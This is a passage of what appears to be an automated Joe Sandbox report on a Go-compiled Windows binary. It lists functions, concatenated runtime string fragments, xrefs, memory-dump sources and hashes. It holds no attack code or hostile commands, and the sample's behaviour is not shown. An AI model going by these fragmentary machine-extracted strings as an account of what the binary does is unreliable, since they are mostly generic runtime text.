goroutines (main called runtime.Goexit) - deadlock!runtime: signal received on thread not created by Go.x509: cannot verify signature: algorithm unimplementedx509: invalid RDNSequence: invalid attribute value: %s is currently not supported for use in syste
                                                                                • API String ID: 0-939784458
                                                                                • Opcode ID: 40b9d7ef04b959403774e57d9d941842d2a636390763bfbf2f5d465689944f0d
                                                                                • Instruction ID: 794aafb2923c61b524c03a7b0ca34785eb3752e1e76d23903d938c536e393ed6
                                                                                • Opcode Fuzzy Hash: 40b9d7ef04b959403774e57d9d941842d2a636390763bfbf2f5d465689944f0d
                                                                                • Instruction Fuzzy Hash: 05818DB4A083488FC704EF76D694B6EBBE1BF85304F04892DE98987352E7709948CF52
                                                                                Function 00ACBF50 Relevance: 8.9, Strings: 7, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has, xrefs: 00ACC20F
                                                                                • marking free objectmarkroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no, xrefs: 00ACC1F9
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACC151
                                                                                • #, xrefs: 00ACC218
                                                                                • found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitec, xrefs: 00ACC127
                                                                                • basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845, xrefs: 00ACC196
                                                                                • runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun, xrefs: 00ACC0FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitec$#$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845$greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetno such multicast network interfacenot a PE file, smaller than tiny PEpersistentalloc: align is too largepidleput: P has$marking free objectmarkroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no$runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning booleantimeBegin/EndPeriod not foun
                                                                                • API String ID: 0-3153111096
                                                                                • Opcode ID: c6e9ee946a943356a907c5f5c8a1dd2d2947c99a423a25568c024460f7752563
                                                                                • Instruction ID: 28beed07569494f954e3ae3bf6edd7da3547a332e684d4d9a0ed3d06974a6702
                                                                                • Opcode Fuzzy Hash: c6e9ee946a943356a907c5f5c8a1dd2d2947c99a423a25568c024460f7752563
                                                                                • Instruction Fuzzy Hash: 5C8169746087408FC700EF29D190B6ABBE0BF89718F45896DE8D88B342D775D946CF92
                                                                                Function 00B055C0 Relevance: 8.9, Strings: 7, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidG, xrefs: 00B0575E
                                                                                • [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:, xrefs: 00B0571F
                                                                                • , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00B057FA
                                                                                • unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailing datax509: unknown errorzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOp, xrefs: 00B05638
                                                                                • minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExte, xrefs: 00B057CC
                                                                                • goroutine impossibleinvalidptrmSpanInUsenotifyListowner diedruntime: gs.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedticks.lock (time.Localtracefree(tracegc()unixpacketunknown pcuser32.dllws2_32.dll of size (targetpc= , plugi, xrefs: 00B056F5
                                                                                • ???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNaNNkoNovOctPC=PDTPGIPGOPGUPKTPSTR10R11R12R13R14R15RAXRBPRBXRCXRDIRDXRSARSIRSPSETSatSepStdSunTLSTSSThuTueURIUTCUs, xrefs: 00B05610
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidG$ [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:$ minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExte$, locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFileMappingWCreateWellKnownSidCryptUnp$???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNaNNkoNovOctPC=PDTPGIPGOPGUPKTPSTR10R11R12R13R14R15RAXRBPRBXRCXRDIRDXRSARSIRSPSETSatSepStdSunTLSTSSThuTueURIUTCUs$goroutine impossibleinvalidptrmSpanInUsenotifyListowner diedruntime: gs.state = schedtracesemacquiresetsockoptstackLarget.Kind == terminatedticks.lock (time.Localtracefree(tracegc()unixpacketunknown pcuser32.dllws2_32.dll of size (targetpc= , plugi$unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailing datax509: unknown errorzero length segment markroot jobs done to unallocated span37252902984619140625Arabic Standard TimeAssemblyRefProcessorAzores Standard TimeCertFindChainInStoreCertOp
                                                                                • API String ID: 0-478029356
                                                                                • Opcode ID: 45e7d6f23169339fa02b8c47f04f2790c175ff9c32f8edae486c394f0564f05f
                                                                                • Instruction ID: bc211f3bd255fef1fa6474cb33bc8f1af66ab59f4b6686dafb387ebbee3679c1
                                                                                • Opcode Fuzzy Hash: 45e7d6f23169339fa02b8c47f04f2790c175ff9c32f8edae486c394f0564f05f
                                                                                • Instruction Fuzzy Hash: C7717E74909B458FC310EF69D18165EBBE0FF88748F80896DE8888B392D770D845DF92
                                                                                Function 00AC0E30 Relevance: 8.9, Strings: 7, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout3051757, xrefs: 00AC0FEE
                                                                                • runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot parse URI %q: invalid domain1734723475976807094411924481391906738281258673617379884, xrefs: 00AC1062
                                                                                • runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888238489627838134765625MapIter.Next called, xrefs: 00AC0F42, 00AC0FC4
                                                                                • runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings., xrefs: 00AC0F87, 00AC104C
                                                                                • ), xrefs: 00AC106B
                                                                                • with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomAttributeDeviceIoControlDllCa, xrefs: 00AC0F6C
                                                                                • but memory size because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandL, xrefs: 00AC1018
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandL$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout3051757$ with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomAttributeDeviceIoControlDllCa$)$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings.$runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888238489627838134765625MapIter.Next called$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot parse URI %q: invalid domain1734723475976807094411924481391906738281258673617379884
                                                                                • API String ID: 0-1146393311
                                                                                • Opcode ID: 40878a3ce37afff76de0dbb0ba017283d84cc0e8c0c1f527e5a3a3f426383026
                                                                                • Instruction ID: 2c9fd6dd4fa8658fca995b92f18b7d0e4345c53d4d1589d7ecfa1588632fd476
                                                                                • Opcode Fuzzy Hash: 40878a3ce37afff76de0dbb0ba017283d84cc0e8c0c1f527e5a3a3f426383026
                                                                                • Instruction Fuzzy Hash: 9C51E1B8909740CFC700EF25D194B1ABBE0BF88708F91886DE8889B352E774D945DB52
                                                                                Function 00ABA890 Relevance: 8.9, Strings: 7, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • 1, xrefs: 00ABAA88
                                                                                • freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at, xrefs: 00ABA9FD
                                                                                • s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayIm, xrefs: 00ABA9B3, 00ABAA4B
                                                                                • s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: i, xrefs: 00ABA9E7
                                                                                • runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nw, xrefs: 00ABAA1D
                                                                                • s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00ABA985
                                                                                • s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left outstanding across sweep generationsx509: Ed25519 k, xrefs: 00ABAA7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayIm$1$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nw$s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left outstanding across sweep generationsx509: Ed25519 k$s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncated tag or lengthwork.nwait > work.nprocx509: i$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod
                                                                                • API String ID: 0-3154549764
                                                                                • Opcode ID: 607ffecd1e4e67060d3a21c269e4e4bba4783caad85b4363a6ef2a2e06c37016
                                                                                • Instruction ID: cdb74c2d55dc1a3148c4993610eb5982ba9969e713caeceee08d59e55a9d5792
                                                                                • Opcode Fuzzy Hash: 607ffecd1e4e67060d3a21c269e4e4bba4783caad85b4363a6ef2a2e06c37016
                                                                                • Instruction Fuzzy Hash: EA51F5B49087848FC340EF65D29466EBBE0BF88708F51886DE8C887242E775D945DB63
                                                                                Function 00AE7AB0 Relevance: 8.8, Strings: 7, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • , newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataea, xrefs: 00AE7B69, 00AE7C10
                                                                                • casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipinvalid NT Header Offset. NT Header Signature not foundos: invalid use of WriteAt on file opened with O_APPEND : internal error: invalid use of , xrefs: 00AE7C50
                                                                                • 7, xrefs: 00AE7C59
                                                                                • , oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyren, xrefs: 00AE7B3F, 00AE7BE6
                                                                                • runtime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnun, xrefs: 00AE7BC4
                                                                                • casfrom_Gscanstatus: gp->status is not in scan state : message too long for RSA public key sizeencountered an error while unpacking image CHPE Metaerrors: *target must be interface or implement errormallocgc called without a P or outside bootstrapping, xrefs: 00AE7BA9
                                                                                • runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI , xrefs: 00AE7B1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
